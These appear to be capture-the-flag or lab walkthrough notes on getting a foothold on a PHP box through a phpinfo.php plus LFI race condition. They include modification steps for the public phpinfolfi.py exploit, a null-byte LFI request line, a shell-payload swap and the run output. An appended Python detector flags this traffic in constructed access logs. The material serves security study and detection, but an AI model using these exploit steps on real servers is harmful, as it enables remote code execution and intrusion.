5 foothold_2 phpinfo.php + LFI
# phpinfo.php contains file_uploads: ON
# if phpinfo.php + LFI is possible, it's possible to create a race condition and get command execution
Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/phpinfolfi.py
# modifications (1 more down)
1. in place of payload (don't modify the full variable), put entire shell.php
2. LFIREQ="""GET /browse.php?file=%s%%00 HTTP/1.1\r
$ python phpinfolfi.py localhost 80 100
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... Traceback (most recent call last):
File "phpinfolfi.py", line 371, in <module>
main()
File "phpinfolfi.py", line 331, in main
offset = getOffset(host, port, reqphp)
File "phpinfolfi.py", line 290, in getOffset
raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output
# added redirection via burp to debug the error and
# checking the response and saw [tmp_name] =>.
# in the script it's [tmp_name] =>
3. modify => to =>
# worked.
# remove burp proxy
$ python phpinfolfi.py 10.10.10.84 80 200
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 112940
Spawning worker pool (200)...
1000 / 1000
:(
Shuttin' down...
# should get shell
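Added here as a defender's counterpart (example code, not from these notes or from phpinfolfi.py): a small Python detector that, run over constructed access-log lines, flags a source that repeatedly POSTs to phpinfo.php while fetching /tmp/php* temp-file names through the `file=` parameter, which is the traffic shape the race above produces. It assumes Apache combined log format, a POST for the phpinfo request, and PHP's default /tmp/php* upload names; all hosts and paths are made up.

```python
import re
from collections import Counter

# Constructed sample access-log lines (combined log format); not from any real host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "POST /phpinfo.php HTTP/1.1" 200 81234
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /browse.php?file=/tmp/phpABC123%00 HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "POST /phpinfo.php HTTP/1.1" 200 81234
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /browse.php?file=/tmp/phpDEF456%00 HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /browse.php?file=about.html HTTP/1.1" 200 2048
"""

# ip, timestamp, method, request path, status; the HTTP version is skipped.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# file= pointing at a PHP upload temp name, optionally null-byte truncated (%00).
TMP_INCLUDE_RE = re.compile(r'[?&]file=/tmp/php[A-Za-z0-9]+(%00)?', re.I)


def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_phpinfo_lfi_race(log_text, threshold=2):
    """Return source IPs that both POST to phpinfo.php and include /tmp/php*
    names via file=, each at least `threshold` times (upload-then-include pattern)."""
    posts, includes = Counter(), Counter()
    for r in parse(log_text):
        if r["method"] == "POST" and r["path"].lower().endswith("/phpinfo.php"):
            posts[r["ip"]] += 1
        elif TMP_INCLUDE_RE.search(r["path"]):
            includes[r["ip"]] += 1
    return sorted(ip for ip in posts if posts[ip] >= threshold and includes[ip] >= threshold)


if __name__ == "__main__":
    print(find_phpinfo_lfi_race(SAMPLE_LOG))  # prints ['10.0.0.5']
```

In practice the threshold should be raised well above 2 and the window bounded in time; the race needs hundreds of paired requests per second, so a single benign phpinfo view will not trip a sensible setting.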